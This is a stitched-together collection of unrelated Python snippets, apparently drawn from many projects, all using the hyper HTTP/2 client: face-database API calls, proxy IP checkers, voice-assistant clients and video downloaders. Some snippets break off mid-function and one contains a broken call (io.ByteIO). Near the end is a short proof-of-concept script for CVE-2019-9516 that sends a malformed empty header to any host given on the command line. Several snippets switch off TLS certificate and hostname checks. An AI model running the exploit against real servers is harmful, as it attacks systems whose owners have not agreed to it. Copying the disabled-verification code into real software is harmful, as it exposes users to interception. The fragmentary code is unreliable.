def h2_connect(s, ip, port): if s == TLS_ON: ctx = ssl.SSLContext() ctx.set_alpn_protocols(['h2']) ctx.verify_mode = ssl.CERT_NONE conn = hyper.HTTP20Connection(ip, port=port, ssl_context=ctx, enable_push=False) elif s == TLS_OFF: conn = hyper.HTTP20Connection(ip, port=port, enable_push=False) conn.connect() return conn
def h2_connect(s, ip, port, verify): if s == True: ctx = ssl.SSLContext() ctx.set_alpn_protocols(['h2']) if verify: ctx.verify_mode = ssl.CERT_REQUIRED ctx.load_default_certs() else: ctx.verify_mode = ssl.CERT_NONE conn = hyper.HTTP20Connection(ip, port=port, ssl_context=ctx) elif s == False: conn = hyper.HTTP20Connection(ip, port=port) conn.connect() return conn
def delete_repo(self): # 删除人像库api path = '/face/v1/repositories/{}'.format(self.repo_id) conn = hyper.HTTP20Connection(self.url) # 请求body是空, 所以x-kassq-sha256填None header = { 'x-kassq-sha256': "", 'Accept': 'application/x.avro', 'Content-type': 'application/x.avro' } # 发送请求 conn.request('DELETE', path, None, header) # 获取response res = conn.get_response() status = res.status if status != 200: # 反序列化错误信息 with io.BytesIO(res.read()) as f: msg = util.read_avro(util.ERROR_SCHEMA, util.ERROR_SCHEMA, f) print('Delete Repo Failed') print('Status: {}'.format(status)) print('Reason: {}'.format(msg['reason'])) else: print('Delete Repo Suucess') print('Status: {}'.format(status)) res.close()
def get_records(): connection = hyper.HTTP20Connection(HomeMaster.request_base) request_body = HomeMaster.__get_request_body( price=random.choice(HomeMaster.__get_price_range())) request_headers = HomeMaster.__get_request_headers() stream_id = connection.request(method='POST', url=HomeMaster.request_search, headers=request_headers, body=request_body) response = connection.get_response(stream_id) response_data = response.read() response_text = response_data.decode() response_json = json.loads(response_text) house_cards = response_json['payload']['listings'] records = dict() for house in house_cards: house_id = house['id'] house_url = house['detailsUrl'] records[house_id] = \ HomeItem( HomeMaster.request_scheme + '://' + HomeMaster.request_base + house_url) return records
def check_http2(self, ssl_sock, host): self.logger.warn("ip:%s use http/2", ssl_sock.ip) start_time = time.time() try: conn = hyper.HTTP20Connection(ssl_sock, host=host, ip=ssl_sock.ip, port=443) conn.request('GET', '/') except Exception as e: # self.logger.exception("xtunnel %r", e) self.logger.debug("ip:%s http/1.1:%r", ssl_sock.ip, e) return ssl_sock try: response = conn.get_response() except Exception as e: self.logger.exception("http2 get response fail:%r", e) return ssl_sock self.logger.debug("ip:%s http/2", ssl_sock.ip) if response.status != 200: self.logger.warn("app check ip:%s status:%d", ssl_sock.ip, response.status) return ssl_sock content = response.read() if self.config.check_ip_content not in content: self.logger.warn("app check content:%s", content) return ssl_sock ssl_sock.ok = True time_cost = (time.time() - start_time) * 1000 ssl_sock.request_time = time_cost self.logger.info("check ok, time:%d", time_cost) return ssl_sock
def check_xtunnel_http2(ssl_sock, host): start_time = time.time() try: conn = hyper.HTTP20Connection(ssl_sock, host=host, ip=ssl_sock.ip, port=443) conn.request('GET', '/') except Exception as e: #xlog.exception("xtunnel %r", e) xlog.debug("ip:%s http/1.1:%r", ssl_sock.ip, e) return ssl_sock try: response = conn.get_response() except Exception as e: xlog.exception("http2 get response fail:%r", e) return ssl_sock xlog.debug("ip:%s http/2", ssl_sock.ip) if response.status != 200: xlog.warn("app check ip:%s status:%d", ssl_sock.ip, response.status) return ssl_sock content = response.read() if "X_Tunnel OK" not in content: xlog.warn("app check content:%s", content) return ssl_sock ssl_sock.support_xtunnel = True time_cost = (time.time() - start_time) * 1000 ssl_sock.request_time = time_cost xlog.info("check_xtunnel ok, time:%d", time_cost) return ssl_sock
def open(self): if self.request == 'hyper': if self.http2: self.__http = hyper.HTTP20Connection( self.host, self.port, proxy_host=self.realhost, proxy_port=self.realport, proxy_headers=self.proxy_headers) else: self.__http = hyper.HTTPConnection( self.host, self.port, proxy_host=self.realhost, proxy_port=self.realport, proxy_headers=self.proxy_headers) elif self.request == 'httpx': self.__http = httpx.AsyncClient(base_url='%s://%s' % (self.scheme, self.host), http2=self.http2) else: if self.http2: self.__http = httplib2.Http() elif self.scheme == 'http': self.__http = http_client.HTTPConnection(self.host, self.port) elif self.scheme == 'https': self.__http = http_client.HTTPSConnection(self.host, self.port) if self.using_proxy(): self.__http.set_tunnel(self.realhost, self.realport, self.proxy_headers)
def insert(self): for image in self.images(): # 插入人像的api path = '/face/v1/repositories/{}/faces/{}'.format( self.repo_id, self.id) # 建立链接 conn = hyper.HTTP20Connection(self.url) # 准备序列化 datum request_obj = { 'face_image': { 'content': image, 'content_type': 'jpg' }, 'extra_meta': 'insert at {}'.format( datetime.datetime.now().strftime('%m/%d/%Y, %H:%M:%S')) } # 序列化 with io.BytesIO() as f: util.write_avro(util.INSERT_FACE_SCHEMA, f, request_obj) body = f.getvalue() # 计算body的sha256 body_hash = hashlib.sha256(body).hexdigest() # 准备请求header header = { # x-kassq-sha256 是body的sha256 'x-kassq-sha256': body_hash, 'Accept': 'application/x.avro', 'Content-type': 'application/x.avro' } # 发送数据 conn.request('PUT', path, body, header) # 获取 response res = conn.get_response() # 读取response的body body = res.read() status = res.status if status != 200: # 反序列化错误信息 with io.BytesIO(body) as f: msg = util.read_avro(util.ERROR_SCHEMA, util.ERROR_SCHEMA, f) print('Insert Face Failed') print('Status: {}'.format(status)) print('Reason: {}'.format(msg['reason'])) sys.exit(2) else: print('Insert face Success') print('Face ID: {}'.format(self.id)) print('Status: {}'.format(status)) self.id += 1 res.close()
def __connect(self): with self.__conn_lock: ctx = ssl.SSLContext(ssl.PROTOCOL_TLS) h2_endpoint = self.__generate_endpoint() logging.debug('http/2 endpoint:%s' % (h2_endpoint)) self.__conn = hyper.HTTP20Connection(h2_endpoint, port = self.__port, force_proto = hyper.tls.NPN_PROTOCOL, ssl_context = ctx) return 0
def test_gae_ip2(ip, appid="xxnet-1"): try: ssl_sock = connect_ssl(ip, timeout=max_timeout) get_ssl_cert_domain(ssl_sock) except socket.timeout: return False except Exception as e: return False ssl_sock.support_gae = False if not ssl_sock.h2: try: if not check_goagent(ssl_sock, appid): return ssl_sock else: ssl_sock.support_gae = True return ssl_sock except Exception as e: return False try: conn = hyper.HTTP20Connection(ssl_sock, host='%s.appspot.com' % appid, ip=ip, port=443) conn.request('GET', '/_gh/') except Exception as e: return ssl_sock try: response = conn.get_response() except Exception as e: return ssl_sock if response.status == 404: return ssl_sock if response.status == 503: # out of quota server_type = response.headers.get('Server', "") if "gws" not in server_type and "Google Frontend" not in server_type and "GFE" not in server_type: return ssl_sock else: ssl_sock.support_gae = True return ssl_sock if response.status != 200: return ssl_sock content = response.read() if "GoAgent" not in content: return ssl_sock ssl_sock.support_gae = True return ssl_sock
def check_http2(self, ssl_sock, host): self.logger.debug("ip:%s use http/2", ssl_sock.ip_str) try: conn = hyper.HTTP20Connection(ssl_sock, host=host, ip=ssl_sock.ip_str, port=443) conn.request('GET', self.config.check_ip_path) response = conn.get_response() return response except Exception as e: self.logger.debug("check ip %s http2 get response fail:%r", ssl_sock.ip_str, e) return False
def __run(self): conn = hyper.HTTP20Connection('{}:443'.format(self.__config['host_url']), force_proto='h2') headers = { "authorization": "Bearer {}".format(self.token) } if 'dueros-device-id' in self.__config: headers['dueros-device-id'] = self.__config['dueros-device-id'] downchannel_id = conn.request('GET', '/{}/directives'.format(self.__config['api']), headers=headers) downchannel_response = conn.get_response(downchannel_id) if downchannel_response.status != 200: raise ValueError("/directives requests return {}".format(downchannel_response.status)) ctype, pdict = cgi.parse_header(downchannel_response.headers['content-type'][0].decode('utf-8')) downchannel_boundary = '--{}'.format(pdict['boundary']).encode('utf-8') downchannel = conn.streams[downchannel_id] downchannel_buffer = io.ByteIO() eventchannel_boundary = 'baidu-voice-engine' self.__ping_time = datetime.datetime.utcnow() + datetime.timedelta(seconds=240) self.event_queue.queue.clear() self.system.synchronize_state() while not self.done: try: event,listener, attachment = self.event.get(timeout=0.25) except queue.Empty: event = None while conn._sock.can_read: conn._single_read() while downchannel.data: framebytes = downchannel._read_one_frame() self.__read_response(framebytes, downchannel_boundary, downchannel_buffer) if event is None: self.__ping(conn) continue headers = { ':method': 'POST', ':scheme': 'https', ':path': '/{}/events'.format(self.__config['api']), 'authorization': 'Bearer {}'.format(self.token), 'content-type': 'multipart/form-data; boundary={}'.format(downchannel_boundary) } if 'dueros-device-id' in self.__config: headers['dueros-device-id'] = self.__config['dueros-device-id'] stream_id = conn.putrequest(headers[':method'], headers[':path']) default_headers = (':method', ':scheme', ':authority', ':path')
def h2c(self, sp=None, **kwargs): context = self.get_http2_client_context(sp) if isinstance(sp.to, tuple): host = sp.to[0] port = sp.to[1] else: host = sp.to port = 0 conn = hyper.HTTP20Connection(host, port=port, ssl_context=context, secure=sp.tls, **kwargs) return conn
def create_repo(self): # 创建人像库api path = '/face/v1/repositories/{}'.format(self.repo_id) # 建立连接 HTTP/2.0 连接 conn = hyper.HTTP20Connection(self.url) # 准备序列化 datum request_obj = { 'name': 'Repo {}'.format(self.repo_id), 'extra_meta': 'insert at {}'.format( datetime.datetime.now().strftime('%m/%d/%Y, %H:%M:%S')) } # 序列化 with io.BytesIO() as f: util.write_avro(util.PUT_REPO_SCHEMA, f, request_obj) body = f.getvalue() # 计算body的sha256 body_hash = hashlib.sha256(body).hexdigest() # 准备请求header header = { # x-kassq-sha256 是body的sha256 'x-kassq-sha256': body_hash, 'Accept': 'application/x.avro', 'Content-type': 'application/x.avro' } # 发送请求 conn.request('PUT', path, body, header) # 获取response res = conn.get_response() status = res.status if status != 200: # 反序列化错误信息 with io.BytesIO(res.read()) as f: msg = util.read_avro(util.ERROR_SCHEMA, util.ERROR_SCHEMA, f) print('Create Repo Failed') print('Status: {}'.format(status)) print('Reason: {}'.format(msg['reason'])) else: print('Create Repo Suucess') print('Status: {}'.format(status)) res.close()
def get_mpd(url): """ Module to download the MPD from the URL and save it to file""" global connection try: ssl_context = hyper.tls.init_context() ssl_context.load_cert_chain(certfile='/mnt/QUIClientServer0/cert.crt', keyfile='/mnt/QUIClientServer0/cert.key') ssl_context.load_verify_locations(cafile='/mnt/QUIClientServer0/cert.pem') parse_url = urllib.parse.urlparse(url) connection = hyper.HTTP20Connection(parse_url.netloc, ssl_context=ssl_context,force_proto='h2', secure=True) #parse_url = urlparse.urlparse(url) ''' combine_url = str.join((parse_url.scheme, "://",parse_url.netloc)) config_dash.LOG.info("DASH URL %s" %combine_url) connection = urllib3.connection_from_url(combine_url) conn_mpd = connection.request('GET', combine_url) config_dash.LOG.info("MPD URL %s" %parse_url.path) ''' #connection = HTTPConnectionPool(parse_url.netloc) http2_conn = connection.request('GET',parse_url.path) mpd_conn=connection.get_response(http2_conn) except hyper.http20.exceptions.HTTP20Error as error: config_dash.LOG.error("Unable to download MPD file HTTP2 Error: %s" % error.code) return None except hyper.http20.exceptions.ConnectionError: error_message = "URLError. Unable to reach Server.Check if Server active" config_dash.LOG.error(error_message) print (error_message) return None except (IOError,httplib.HTTPException) as e1: message = "Unable to , file_identifierdownload MPD file HTTP Error." config_dash.LOG.error(message) return None #mpd_data = mpd_conn.read() #connection.close() mpd_file = url.split('/')[-1] mpd_file_handle = open(mpd_file, 'wb') mpd_file_handle.write(mpd_conn.read()) mpd_file_handle.close() mpd_conn.close() #mpd_conn.release_conn() #config_dash.LOG.info(mpd_conn.data) config_dash.LOG.info("Downloaded the MPD file {}".format(mpd_file)) return mpd_file
def test_gae_ip2(ip, appid="xxnet-1"): content = init_context() conn = hyper.HTTP20Connection(host='%s.appspot.com' % appid, ip=ip, port=443, ssl_content=content) try: conn.request('GET', '/_gh/') except Exception as e: xlog.exception("gae %r", e) return False response = conn.get_response() if response.status == 404: if __name__ == "__main__": xlog.warn("app check %s status:%d", appid, response.status) return False if response.status == 503: # out of quota server_type = response.getheader('Server', "") if "gws" not in server_type and "Google Frontend" not in server_type and "GFE" not in server_type: if __name__ == "__main__": xlog.warn("503 but server type:%s", server_type) return False else: if __name__ == "__main__": xlog.info("503 server type:%s", server_type) return True if response.status != 200: if __name__ == "__main__": xlog.warn("app check %s ip:%s status:%d", appid, ip, response.status) return False content = response.read() if "GoAgent" not in content: if __name__ == "__main__": xlog.warn("app check %s content:%s", appid, content) return False if __name__ == "__main__": xlog.info("check_goagent ok") return True
def __init__(self, mode, url, **kwargs): self.conn = hyper.HTTP20Connection( url, 17332, window_manager=StupidFlowControlManager) path = '/face/v1/face_results' self.mode = mode # 建立连接 self.conn.request('GET', path) # 获取response self.response = self.conn.get_response() # 在headers中拿到write_schema, 用于反序列化 self.write_schema = b','.join( self.response.headers.get('x-kassq-schema')).decode() self.save_scene = kwargs.get('save_scene') self.save_feature = kwargs.get('save_feature') self.save_face = kwargs.get('save_face') self.directory = kwargs.get('directory') self.count = 0
def test_gae_ip2(ip, appid="xxnet-1"): try: ssl_sock = connect_ssl(ip, timeout=max_timeout) get_ssl_cert_domain(ssl_sock) except socket.timeout: xlog.warn("connect timeout") return False except Exception as e: xlog.exception("test_gae_ip %s e:%r",ip, e) return False ssl_sock.support_gae = False if not ssl_sock.h2: xlog.warn("ip:%s not support http/2", ip) try: if not check_goagent(ssl_sock, appid): return ssl_sock else: ssl_sock.support_gae = True return ssl_sock except Exception as e: xlog.warn("check fail:%r", e) return False try: conn = hyper.HTTP20Connection(ssl_sock, host='%s.appspot.com'%appid, ip=ip, port=443) conn.request('GET', '/_gh/') except Exception as e: #xlog.exception("gae %r", e) xlog.debug("ip:%s http/1.1:%r", ip, e ) return ssl_sock try: response = conn.get_response() except Exception as e: xlog.exception("http2 get response fail:%r", e) return ssl_sock xlog.debug("ip:%s http/2", ip) if response.status == 404: xlog.warn("app check %s status:%d", appid, response.status) return ssl_sock if response.status == 503: # out of quota server_type = response.headers.get('Server', "") xlog.debug("Server type:%s", server_type) if "gws" not in server_type and "Google Frontend" not in server_type and "GFE" not in server_type: xlog.warn("503 but server type:%s", server_type) return ssl_sock else: xlog.info("503 server type:%s", server_type) ssl_sock.support_gae = True return ssl_sock if response.status != 200: xlog.warn("app check %s ip:%s status:%d", appid, ip, response.status) return ssl_sock content = response.read() if "GoAgent" not in content: xlog.warn("app check %s content:%s", appid, content) return ssl_sock xlog.info("check_goagent ok") ssl_sock.support_gae = True return ssl_sock
def eventQueueThread(self): conn = hyper.HTTP20Connection('avs-alexa-na.amazon.com:443', force_proto="h2") alexa_tokens = self.get_alexa_tokens() def handle_downstream(): directives_stream_id = conn.request( 'GET', '/{}/directives'.format(self._api_version), headers={ 'Authorization': 'Bearer %s' % alexa_tokens['access_token'] }) self._log.info("Alexa: directives stream is %s", directives_stream_id) directives_stream = conn._get_stream(directives_stream_id) downchannel = HTTP20Downchannel(directives_stream.getheaders(), directives_stream) self._log.info("Alexa: status=%s headers=%s", downchannel.status, downchannel.headers) ctype, pdict = cgi.parse_header( downchannel.headers['content-type'][0].decode('utf-8')) boundary = bytes("--{}".format(pdict['boundary']), 'utf-8') self._log.info("Downstream boundary is %s", boundary) if downchannel.status != 200: self._log.warning(downchannel) raise ValueError("/directive requests returned {}".format( downchannel.status)) return directives_stream, boundary directives_stream, downstream_boundary = handle_downstream() messageId = uuid.uuid4().hex self._send_event( { "header": { "namespace": "System", "name": "SynchronizeState", "messageId": messageId }, "payload": {} }, expectedStatusCode=204) downstream_buffer = io.BytesIO() while True: #self._log.info("Waiting for event to send to AVS") #self._log.info("Connection socket can_read %s", conn._sock.can_read) try: event, attachment, expectedStatusCode, speakingFinishedEvent = self._eventQueue.get( timeout=0.25) except queue.Empty: event = None # TODO check that connection is still functioning and reestablish if needed while directives_stream.data or (conn._sock and conn._sock.can_read): # we want to avoid blocking if the data wasn't for stream directives_stream if conn._sock and conn._sock.can_read: conn._recv_cb() while directives_stream.data: framebytes = directives_stream._read_one_frame() self._log.info(framebytes) #self._log.info(framebytes.split(downstream_boundary)) self._read_response(framebytes, downstream_boundary, downstream_buffer) if event is None: continue metadata = {"context": self._context(), "event": event} self._log.debug("Sending to AVS: \n%s", pprint.pformat(metadata)) boundary = uuid.uuid4().hex json_part = bytes( u'--{}\r\nContent-Disposition: form-data; name="metadata"\r\nContent-Type: application/json; charset=UTF-8\r\n\r\n{}' .format(boundary, json.dumps(metadata).encode('utf-8')), 'utf-8') json_hdr = bytes( u'--{}\r\nContent-Disposition: form-data; name="metadata"\r\nContent-Type: application/json; charset=UTF-8\r\n\r\n' .format(boundary), 'utf-8') end_part = bytes("\r\n--{}--".format(boundary), 'utf-8') headers = { ':method': 'POST', ':scheme': 'https', ':path': '/{}/events'.format(self._api_version), 'Authorization': 'Bearer %s' % self.get_alexa_tokens()['access_token'], 'Content-Type': 'multipart/form-data; boundary={}'.format(boundary) } with conn._write_lock: stream_id = conn.putrequest(headers[':method'], headers[':path']) default_headers = (':method', ':scheme', ':authority', ':path') for name, value in headers.items(): is_default = name in default_headers conn.putheader(name, value, stream_id, replace=is_default) conn.endheaders(final=False, stream_id=stream_id) self._log.info("Alexa: Making request using stream %s", stream_id) #print(json_part) conn.send(json_hdr, final=False, stream_id=stream_id) conn.send(json.dumps(metadata).encode('utf-8'), final=False, stream_id=stream_id) if attachment: hdr = bytes( u'\r\n--{}\r\nContent-Disposition: form-data; name="{}"\r\nContent-Type: application/octet-stream\r\n\r\n{}' .format(boundary, attachment[0], json.dumps(metadata).encode('utf-8')), 'utf-8') conn.send(hdr, final=False, stream_id=stream_id) AVS_AUDIO_CHUNK_PREFERENCE = 320 #print(speakingFinishedEvent) while True: #sys.stdout.write("X ") #sys.stdout.flush() #self._log.info("Getting bytes from queue %s", attachment[1]) if isinstance(attachment[1], queue.Queue): try: chunk = attachment[1].get(block=True, timeout=1) except queue.Empty as e: chunk = '' else: chunk = attachment[1].read(AVS_AUDIO_CHUNK_PREFERENCE) #sys.stdout.write(str(len(chunk))) #sys.stdout.write(" x") #sys.stdout.flush() if speakingFinishedEvent and speakingFinishedEvent.is_set( ): break if chunk: #sys.stdout.write("+") #sys.stdout.flush() conn.send(chunk, final=False, stream_id=stream_id) elif speakingFinishedEvent is None: #sys.stdout.write("#") #sys.stdout.flush() break #sys.stdout.write("=") #sys.stdout.flush() conn.send(end_part, final=True, stream_id=stream_id) self._log.info("Alexa: Made request using stream %s", stream_id) resp = conn.get_response(stream_id) self._log.info("Alexa HTTP status code: %s", resp.status) self._log.debug(resp.headers) if expectedStatusCode and resp.status != expectedStatusCode: self._log.warning("AVS status code unexpected: %s", resp.status) self._log.warning(resp.headers) self._log.warning(resp.read()) if resp.status == 200: self._read_response(resp)
import ssl import hyper from hyper.tls import init_context # Custom SSLCONTEXT for not verifying SSLCertificate and Hostname ssl_context = init_context() hyper.tls._context = ssl_context hyper.tls._context.check_hostname = False hyper.tls._context.verify_mode = ssl.CERT_NONE conn = hyper.HTTP20Connection('localhost', port=7100, secure=True, ssl_context=ssl_context) conn.request('GET', '/') print(conn.get_response())
def connect(self): self.conn = hyper.HTTP20Connection(self.url.netloc, port=443, secure=True) self.conn.connect()
import timeit import threading import hyper import urllib import collections import time t_urlA=0 t_urlB=0 rate_A=0.0 rate_B=0.0 DOWNLOAD_CHUNK=1500 NUM_OF_DOWNLOADS=2 MAX_TRIALS=1 urlA="http://10.10.10.4/www-itec.uni-klu.ac.at/ftp/datasets/DASHDataset2014/BigBuckBunny/2sec/bunny_4219897bps/BigBuckBunny_2s180.m4s" urlB="http://10.10.10.4/www-itec.uni-klu.ac.at/ftp/datasets/DASHDataset2014/BigBuckBunny/2sec/bunny_4219897bps/BigBuckBunny_2s180.m4s" connection = hyper.HTTP20Connection('10.10.10.4', port=80, force_proto='h2', secure=False) time_list=collections.OrderedDict() rate_list=collections.OrderedDict() def get_file(url1): #global t_urlA #global t_urlB #global rate_A #global rate_B parse_url = urllib.parse.urlparse(url1) segment_size=0 t_start1=timeit.default_timer() http2_conn = connection.request('GET',parse_url.path) f_conn=connection.get_response(http2_conn) ''' f_data=f_conn.read(int(DOWNLOAD_CHUNK)) while f_data: #<---
# # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import argparse import sys import hyper # Utility to healthcheck the http2 server. Used when starting the server to # verify that the server is live before tests begin. if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('--server_host', type=str, default='localhost') parser.add_argument('--server_port', type=int, default=8080) args = parser.parse_args() server_host = args.server_host server_port = args.server_port conn = hyper.HTTP20Connection('%s:%d' % (server_host, server_port)) conn.request('POST', '/grpc.testing.TestService/UnaryCall') resp = conn.get_response() if resp.headers.get('grpc-encoding') is None: sys.exit(1) else: sys.exit(0)
def __init__(self, uri_or_host, port=None, path=None, customThrift=False, request='httplib', http2=False, proxy_host=None, proxy_port=None, proxy_auth=None): '''THttpClient supports two different types constructor parameters. THttpClient(host, port, path) - deprecated THttpClient(uri) Only the second supports https. ''' if port is not None: warnings.warn( 'Please use the THttpClient("http://host:port/path") syntax', DeprecationWarning, stacklevel=2) self.host = uri_or_host self.port = port assert path self.path = path self.scheme = 'http' else: parsed = urllib.parse.urlparse(uri_or_host) self.scheme = parsed.scheme assert self.scheme in ('http', 'https') if self.scheme == 'http': self.port = parsed.port or http_client.HTTP_PORT elif self.scheme == 'https': self.port = parsed.port or http_client.HTTPS_PORT self.host = parsed.hostname self.path = parsed.path if parsed.query: self.path += '?%s' % parsed.query proxy = None self.request = request self.http2 = http2 self.realhost = proxy_host self.realport = proxy_port self.proxy_auth = proxy_auth self.__wbuf = BytesIO() if self.scheme == 'https' and self.using_proxy() and self.proxy_auth: self.proxy_headers = {'Proxy-Authorization': self.proxy_auth} else: self.proxy_headers = None self.url = '%s://%s:%s%s' % (self.scheme, self.host, self.port, self.path) if customThrift: if self.request == 'hyper': if self.http2: self.__http = hyper.HTTP20Connection( self.host, self.port, proxy_host=self.realhost, proxy_port=self.realport, proxy_headers=self.proxy_headers) else: self.__http = hyper.HTTPConnection( self.host, self.port, proxy_host=self.realhost, proxy_port=self.realport, proxy_headers=self.proxy_headers) elif self.request == 'httpx': self.__http = httpx.AsyncClient(base_url='%s://%s' % (self.scheme, self.host), http2=self.http2) else: if self.http2: self.__http = httplib2.Http() elif self.scheme == 'http': self.__http = http_client.HTTPConnection( self.host, self.port) elif self.scheme == 'https': self.__http = http_client.HTTPSConnection( self.host, self.port) if self.using_proxy(): self.__http.set_tunnel(self.realhost, self.realport, self.proxy_headers) else: self.__http = None self.__async_loop = asyncio.get_event_loop( ) if self.request == 'httpx' else None self.__http_response = None self.__response_data = None self.__last_read = 0 self.__timeout = None self.__custom_headers = None self.__time = time.time() self.__custom_thrift = customThrift self.__loop = 0
def get_mpd(url): """ Module to download the MPD from the URL and save it to file""" global connection try: ssl_context = hyper.tls.init_context() ssl_context.load_cert_chain(certfile='/dev/SQUAD/cert.crt', keyfile='/dev/SQUAD/cert.key') ssl_context.load_verify_locations(cafile='/dev/SQUAD/cert.pem') parse_url = urllib.parse.urlparse(url) connection = hyper.HTTP20Connection(parse_url.netloc, ssl_context=ssl_context, force_proto='h2', secure=True, port=443) connection.network_buffer_size = int(DOWNLOAD_CHUNK) #parse_url = urlparse.urlparse(url) ''' combine_url = str.join((parse_url.scheme, "://",parse_url.netloc)) config_dash.LOG.info("DASH URL %s" %combine_url) connection = urllib3.connection_from_url(combine_url) conn_mpd = connection.request('GET', combine_url) config_dash.LOG.info("MPD URL %s" %parse_url.path) ''' #connection = HTTPConnectionPool(parse_url.netloc) http2_conn = connection.request('GET', parse_url.path) mpd_conn = connection.get_response(http2_conn) except hyper.http20.exceptions.HTTP20Error as error: config_dash.LOG.error("Unable to download MPD file HTTP2 Error: %s" % error.code) return None except hyper.http20.exceptions.ConnectionError: error_message = "URLError. Unable to reach Server.Check if Server active" config_dash.LOG.error(error_message) print(error_message) return None except (IOError, httplib.HTTPException) as e1: message = "Unable to , file_identifierdownload MPD file HTTP Error." config_dash.LOG.error(message) return None #mpd_data = mpd_conn.read() #connection.close() mpd_file = url.split('/')[-1] t = [] i = 0 chunk_dl_rates = [] mpd_file_handle = open(mpd_file, 'wb') chunk_start_time = timeit.default_timer() segment_size = 0 chunk_number = 0 total_data_dl_time = 0 # for mpd_data in mpd_conn.read_proper_chunks(int(DOWNLOAD_CHUNK)): mpd_data = mpd_conn.read(int(DOWNLOAD_CHUNK)) while mpd_data: # segment_size += len(mpd_data) # timenow = timeit.default_timer() # chunk_dl_time = timenow - chunk_start_time # chunk_start_time=timenow # chunk_number += 1 # total_data_dl_time += chunk_dl_time # current_chunk_dl_rate = segment_size * 8 / total_data_dl_time # chunk_dl_rates.append(current_chunk_dl_rate) # t.append(i)""" mpd_file_handle.write(mpd_data) if (len(mpd_data) < DOWNLOAD_CHUNK): # print("saw b:{},chunks:{}".format(len(t),chunk_dl_rates)) # exit() break mpd_data = mpd_conn.read(int(DOWNLOAD_CHUNK)) #print("MPD seg:#",mpd_data) mpd_file_handle.close() mpd_conn.close() #mpd_conn.release_conn() #config_dash.LOG.info(mpd_conn.data) config_dash.LOG.info("Downloaded the MPD file {}".format(mpd_file)) return mpd_file
# # - Patch: https://github.com/nginx/nginx/commit/6dfbc8b1c2116f362bb871efebbf9df576738e89 # - https://www.nginx.com/blog/nginx-updates-mitigate-august-2019-http-2-vulnerabilities # # usage: # ./CVE-2019-9516.py <host> # # [/csh:]> date "+%D" # 07/07/21 # # SSLCONTEXT for not verifying SSLCertificate and Hostname context = ssl.SSLContext(ssl.PROTOCOL_SSLv23) context.verify_mode = ssl.CERT_NONE context.check_hostname = False context.set_alpn_protocols(['h2']) hyper.tls._context = context headers = {'': ''} conn = hyper.HTTP20Connection(sys.argv[1], port=443, ssl_context=context) conn.request('GET', '/', headers=headers) resp = conn.get_response() #print(resp) print(resp.status) print(resp.headers) print(resp.read().decode('utf8'))
def _send_http2_request_to_server(self, request_headers, req_body, client_stream_id): if not self.is_h2_to_server: raise RuntimeError( "Unexpected received non is_h2_to_server in _send_http2_request_to_server" ) request_headers_message = HttpHeaders() for name, value in request_headers: request_headers_message.add_header(name, value) request_headers = request_headers_message request_headers = ProxyRequestHandler.filter_headers(request_headers) scheme = request_headers[':scheme'] replay_server = "127.0.0.1:{}".format(self.server_port) method = request_headers[':method'] path = request_headers[':path'] try: origin = (scheme, replay_server, self.client_sni) if origin not in self.tls.http_conns: gcontext = hyper.tls.init_context(cert_path=self.ca_file, cert=self.cert_file) if self.client_sni: setattr(gcontext, "old_wrap_socket", gcontext.wrap_socket) def new_wrap_socket(sock, *args, **kwargs): kwargs['server_hostname'] = self.client_sni gcontext.check_hostname = False return gcontext.old_wrap_socket(sock, *args, **kwargs) setattr(gcontext, "wrap_socket", new_wrap_socket) http2_connection = hyper.HTTP20Connection( '127.0.0.1', port=self.server_port, secure=True, ssl_context=gcontext) try: http2_connection.connect() except AssertionError: # This will happen if the ALPN negotiation refuses HTTP2. Try with HTTP/1. print("HTTP/2 negotiation failed. Trying with HTTP/1") return self._send_http1_request_to_server( request_headers, req_body, client_stream_id) self.tls.http_conns[origin] = http2_connection connection_to_server = self.tls.http_conns[origin] server_stream_id = connection_to_server.request( method, path, req_body, request_headers) res = connection_to_server.get_response(server_stream_id) response_body = res.read(decode_content=False) except Exception as e: if origin in self.tls.http_conns: del self.tls.http_conns[origin] self.listening_conn.send_headers(client_stream_id, ((':status', '502')), end_stream=True) print( "Connection to '{}' initiated with request to '{}://{}{}' failed: {}" .format(replay_server, scheme, request_headers.get(':authority', ''), path, e)) traceback.print_exc(file=sys.stdout) return setattr(res, 'headers', ProxyRequestHandler.filter_headers(res.headers)) response_headers = ((':status', str(res.status)), ) previous_k = b'' previous_v = b'' for k, v in res.headers: if k == b'date' and k == previous_k: # This happens with date, which HTTPHeaderMap annoyingly splits # on the comma: # "Sat, 16 Mar 2019 01:13:21 GMT" # # This yields the following two tuples: # (b'date', b'Sat') # (b'date', b'16 Mar 2019 01:13:21 GMT') v = previous_v + b', ' + v response_headers = response_headers[0:-1] response_headers += ((k, v), ) previous_k, previous_v = k, v self.print_info(request_headers, req_body, response_headers, response_body, res.status, res.reason) return response_headers, response_body
def __run(self): ''' run方法实现 :return: ''' conn = hyper.HTTP20Connection('{}:443'.format(self.__config['host_url']), force_proto='h2') headers = {'authorization': 'Bearer {}'.format(self.token)} if 'dueros-device-id' in self.__config: headers['dueros-device-id'] = self.__config['dueros-device-id'] downchannel_id = conn.request('GET', '/{}/directives'.format(self.__config['api']), headers=headers) downchannel_response = conn.get_response(downchannel_id) if downchannel_response.status != 200: raise ValueError("/directive requests returned {}".format(downchannel_response.status)) ctype, pdict = cgi.parse_header(downchannel_response.headers['content-type'][0].decode('utf-8')) downchannel_boundary = '--{}'.format(pdict['boundary']).encode('utf-8') downchannel = conn.streams[downchannel_id] downchannel_buffer = io.BytesIO() eventchannel_boundary = 'baidu-voice-engine' # ping every 5 minutes (60 seconds early for latency) to maintain the connection self.__ping_time = datetime.datetime.utcnow() + datetime.timedelta(seconds=240) self.event_queue.queue.clear() self.system.synchronize_state() while not self.done: # logger.info("Waiting for event to send to AVS") # logger.info("Connection socket can_read %s", conn._sock.can_read) try: event, listener, attachment = self.event_queue.get(timeout=0.25) except queue.Empty: event = None # we want to avoid blocking if the data wasn't for stream downchannel while conn._sock.can_read: conn._single_read() while downchannel.data: framebytes = downchannel._read_one_frame() self.__read_response(framebytes, downchannel_boundary, downchannel_buffer) if event is None: self.__ping(conn) continue headers = { ':method': 'POST', ':scheme': 'https', ':path': '/{}/events'.format(self.__config['api']), 'authorization': 'Bearer {}'.format(self.token), 'content-type': 'multipart/form-data; boundary={}'.format(eventchannel_boundary) } if 'dueros-device-id' in self.__config: headers['dueros-device-id'] = self.__config['dueros-device-id'] 